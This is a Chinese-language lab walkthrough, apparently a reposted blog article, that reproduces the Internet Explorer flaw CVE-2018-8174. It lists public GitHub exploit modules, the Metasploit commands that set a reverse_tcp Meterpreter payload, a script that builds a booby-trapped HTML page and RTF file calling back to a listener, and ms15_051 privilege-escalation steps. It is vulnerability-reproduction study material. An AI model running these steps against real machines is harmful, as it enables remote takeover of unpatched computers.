1. 程式人生 > >CVE-2018-8174漏洞兩種姿勢的復現

CVE-2018-8174漏洞兩種姿勢的復現

CVE-2018-8174漏洞兩種姿勢的復現

CVE-2018-8174漏洞兩種姿勢的復現
漏洞介紹:
該漏洞影響最新版本的IE瀏覽器及使用了IE核心的應用程式。使用者在瀏覽網頁或開啟Office文件時都可能中招,最終被黑客植入後門木馬完全控制電腦。微軟在4月20日早上確認此漏洞,並於5月8號釋出了官方安全補丁,對該0day漏洞進行了修復,並將其命名為CVE-2018-8174。
復現過程1:
1、首先到GitHub上下載用於該漏洞的攻擊模組
https://github.com/0x09AL/CVE-2018-8174-msf.git

在這裡插入圖片描述
在這裡插入圖片描述
下載到kali之中並檢視一下目錄是否成功下載
將CVE-2018-8174.rb複製到 fileformat 目錄/:
cd CVE-2018-8174-msf/
cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
將CVE-2018-8174.rtf複製到 exploits 目錄:
cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/
在這裡插入圖片描述

同樣進入目錄檢視一下是否複製成功
在這裡插入圖片描述

啟動 metasploit
use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.1.140
set lhost 192.168.1.140
exploit
在這裡插入圖片描述

已啟動埠監聽,在靶機上測試
在這裡插入圖片描述
在物理機上的最新一代IE瀏覽器訪問192.168.1.119:8080我們可以看見進行了會話,但是並沒有建立連線

漏洞復現二:
使用CVE-2018-8174_EXP進一步從復現一進行建立連線
在這裡插入圖片描述
同樣先到GitHub上下載CVE-2018-8174_EXP,我這裡已經裝過了,所以說我的路徑一存在

https://github.com/Sch01ar/CVE-2018-8174_EXP.git
接著進入CVE-2018-8174_EXP目錄
將CVE-2018-8174.rb複製到 fileformat 目錄
cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
將CVE-2018-8174.rtf複製到 exploits 目錄
cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/
在這裡插入圖片描述
在這裡插入圖片描述

這裡借用了一下別人的圖,因為我已做過一遍目錄已經改變
在這裡插入圖片描述

生成帶有惡意 VBscript 的 html 頁面和 word 文件
python CVE-2018-8174.py -u 192.168.1.119/exploit.html -o msf.rtf -i 192.168.1.119 -p 4444
-u:URL 地址
-o:生成文件
-i:監聽地址
-p:監聽埠
在這裡插入圖片描述
把 explot.html 複製到 /var/www/html,並開啟 apache 服務,以便靶機可以通過網頁訪問
在這裡插入圖片描述

使用nc 開啟埠的監聽

接下來現在win10上進行試驗,在靶機上使用IE或者是IE核心的瀏覽器進行訪問192.168.1.119/exploit,html
在這裡插入圖片描述
Win10上進行訪問之後沒有連線建立,說明最新版的win10中的IE瀏覽器已經沒有了該漏洞
接下來在win7上進行一次試驗
在這裡插入圖片描述
在這裡插入圖片描述
在沒有打補丁的win7上存在該漏洞,並可以直接拿到shell,雖然不是管理員,但是已經可以幹很多事了,接下來便是提權的問題
該漏洞提權思路:先將 shell 轉換為 meterpreter ,再利用ms15_051提權
1、sessions -u 2
2、use windows/local/ms15_051_client_copy_image
3、set session 3
4、run
但是我還沒有成功,因為總是會在將shell轉換為meterpreter時連線斷掉,正在做後續的研究